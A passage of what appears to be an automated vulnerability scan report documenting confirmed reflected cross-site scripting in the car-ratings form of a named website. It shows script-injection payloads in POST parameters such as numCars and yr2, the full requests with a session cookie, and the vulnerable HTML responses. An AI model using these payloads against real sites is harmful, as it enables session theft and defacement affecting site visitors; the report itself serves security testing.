href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="'"--></style></script><script>netsparker(0x000AD7)</script>" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="C..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST '"--></style></script><script>alert(0x000AD8)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000AD8)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:48:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000AD8)</script>" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr> <tr><td>2.</td><td>&l..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000B55)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B55)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:49:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x000B55)</script>" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" 